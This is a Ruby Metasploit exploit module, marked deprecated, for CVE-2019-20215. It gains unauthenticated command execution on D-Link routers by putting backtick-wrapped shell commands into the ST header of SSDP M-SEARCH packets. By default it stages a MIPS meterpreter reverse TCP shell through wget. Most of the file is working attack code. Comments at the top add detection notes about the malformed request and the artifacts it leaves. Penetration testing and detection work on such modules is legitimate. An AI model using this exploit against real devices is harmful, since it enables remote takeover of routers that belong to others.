rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Deprecated Metasploit module for CVE-2019-20215 (D-Link ssdpcgi). The
# `deprecated` call below points users at
# exploit/linux/upnp/dlink_upnp_msearch_exec as its replacement.
#
# What the code on this page does: it sends one SSDP M-SEARCH datagram per
# staged command over UDP, with the command wrapped in backticks inside the
# ST header value. Reviewer notes for detection work, all derived from the
# request built in #execute_command:
#   * the ST value starts with "urn:device:1;" or "uuid:" and is followed by
#     a backtick-delimited string, which a legitimate search target has no
#     reason to contain;
#   * the Host header is emitted as "239.255.255.250: <RPORT>", i.e. with a
#     space after the second colon;
#   * 'Notes' declares IOC_IN_LOGS and ARTIFACTS_ON_DISK, so the module's
#     authors expect log entries and on-disk artifacts to be left on the
#     target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager
  include Msf::Module::Deprecated

  deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')

  # Registers the module metadata and the single module-specific option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values declared here through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
        'Description' => %q{
          D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
        },
        'Author' => ['s1kr10s', 'secenv'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
        'DisclosureDate' => '2019-12-24',
        'Privileged' => true,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT' => '1900'
        },
        'Targets' => [['Auto', {}]],
        'CmdStagerFlavor' => ['echo', 'wget'],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    # VECTOR selects which ST value prefix carries the command; it defaults
    # to 'URN' and accepts only 'URN' or 'UUID'.
    vector_option = Msf::OptEnum.new(
      'VECTOR',
      [true, 'Header through which to exploit the vulnerability', 'URN', %w[URN UUID]]
    )
    register_options([vector_option])
  end

  # Entry point invoked by the framework; hands off to the command stager,
  # which calls #execute_command for each staged command line.
  # NOTE(review): linemax presumably caps each staged line at 1500
  # characters -- confirm against Msf::Exploit::CmdStager.
  def exploit
    execute_cmdstager(linemax: 1500)
  end

  # Sends one M-SEARCH request whose ST header embeds +cmd+ in backticks.
  #
  # @param cmd [String] command line produced by the command stager
  # @param _opts [Hash] stager options, unused here
  def execute_command(cmd, _opts)
    vector = datastore['VECTOR']

    # Any VECTOR value other than 'URN' takes the UUID form.
    st_value =
      if vector == 'URN'
        print_status('Target Payload URN')
        "urn:device:1;`#{cmd}`"
      else
        print_status('Target Payload UUID')
        "uuid:`#{cmd}`"
      end

    connect_udp

    # Header lines are joined with CRLF and closed with an empty line. The
    # Host value (including the space after the second colon) is kept
    # exactly as the module has always sent it.
    request = [
      'M-SEARCH * HTTP/1.1',
      "Host:239.255.255.250: #{datastore['RPORT']}",
      "ST:#{st_value}",
      'Man:"ssdp:discover"',
      'MX:2'
    ].join("\r\n") + "\r\n\r\n"

    udp_sock.put(request)
    disconnect_udp
  end
end